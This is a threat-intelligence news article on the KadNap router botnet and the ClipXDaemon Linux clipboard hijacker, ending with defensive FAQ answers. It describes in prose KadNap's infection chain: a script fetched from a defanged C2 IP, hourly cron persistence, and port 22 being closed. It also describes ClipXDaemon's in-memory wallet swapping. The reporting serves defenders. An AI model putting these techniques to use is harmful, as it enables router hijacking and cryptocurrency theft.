KadNap Botnet Infects 14,000+ Asus Routers While ClipXDaemon Targets Linux Crypto Wallets

Cybersecurity researchers at the Black Lotus Labs team at Lumen have uncovered a sophisticated new malware strain named KadNap, which has infected over 14,000 edge devices - primarily Asus routers - to build a stealthy proxy botnet. Operating in the wild since August 2025, the botnet leverages a custom Kademlia Distributed Hash Table (DHT) protocol to conceal its command-and-control (C2) infrastructure within a decentralized peer-to-peer (P2P) network. Concurrently, researchers at Cyble have detailed a separate Linux threat dubbed ClipXDaemon, which silently hijacks cryptocurrency transactions in X11 environments.

This dual-threat landscape is critical for network administrators, IT security professionals, and Linux users to understand. By analyzing KadNap's resilient P2P architecture and ClipXDaemon's memory-only execution, defenders can better secure edge networking devices against proxy conscription and protect digital assets from real-time clipboard manipulation.

According to the report, more than 60% of KadNap victims are located in the U.S., with additional infections spanning Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy, and Spain. Once a device is compromised, its bandwidth is marketed by a proxy service named Doppelgänger (doppelganger[.]shop). Launched around May or June 2025, Doppelgänger is assessed to be a rebrand of Faceless, a proxy service previously associated with TheMoon malware, claiming to offer "100% anonymity" via resident proxies in over 50 countries.

The infection chain begins with a shell script named "aic.sh" downloaded from the C2 server at 212.104.141[.]140. This script establishes persistence by creating a cron job that retrieves the file at the 55-minute mark of every hour, renames it to ".asusrouter", and executes it. The script then pulls a malicious ELF file, renames it to "kad", and deploys the core KadNap malware, which is capable of targeting both ARM and MIPS processors.

To maintain its decentralized network, KadNap connects to a Network Time Protocol (NTP) server to fetch the current time and host uptime. It uses this data to generate a hash for locating other peers in the DHT network. Furthermore, the malware utilizes specific files - "fwr.sh" and "/tmp/.sose" - to close port 22 (the standard TCP port for Secure Shell) on the infected device, effectively locking out other threat actors, before extracting a list of C2 IP and port combinations.

While KadNap targets network edges, a new Linux post-exploitation threat named ClipXDaemon is targeting end-users. Delivered via the ShadowHS framework, ClipXDaemon is an autonomous cryptocurrency clipboard hijacker designed specifically for Linux X11 environments. Staged entirely in memory, the malware monitors the system clipboard every 200 milliseconds, substituting copied wallet addresses with attacker-controlled destinations in real time.

The malware supports a wide array of digital assets, specifically targeting Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON wallets. Notably, ClipXDaemon deliberately avoids execution in Wayland sessions. Because the Wayland display server protocol requires explicit user interaction before applications can access clipboard content, the malware disables itself in these environments to prevent runtime failures and avoid generating suspicious noise.

The simultaneous rise of KadNap and ClipXDaemon highlights a distinct evolution in how threat actors approach Linux and IoT ecosystems. KadNap's use of a custom DHT protocol to mask its C2 infrastructure demonstrates a shift away from easily blockable centralized servers toward highly resilient, decentralized botnets. By monetizing compromised Asus routers through the Doppelgänger proxy service, attackers are creating a self-sustaining illicit business model. Meanwhile, ClipXDaemon's deliberate avoidance of Wayland sessions proves that modern Linux malware is becoming highly context-aware. The fact that it operates entirely without C2 logic makes it exceptionally difficult for traditional network monitoring tools to detect, emphasizing the urgent need for robust endpoint security and the accelerated adoption of Wayland across Linux distributions.

How can I protect my router from the KadNap botnet?

Users operating SOHO routers, particularly Asus models, should regularly reboot their devices, apply the latest firmware updates, change default administrative passwords, disable remote management interfaces, and replace any end-of-life hardware that no longer receives security patches.

Why does ClipXDaemon avoid Wayland sessions?

Wayland's security architecture enforces strict isolation, requiring explicit user interaction before an application can read the clipboard. ClipXDaemon disables itself in Wayland to avoid triggering security alerts or crashing, focusing exclusively on the more permissive X11 environments.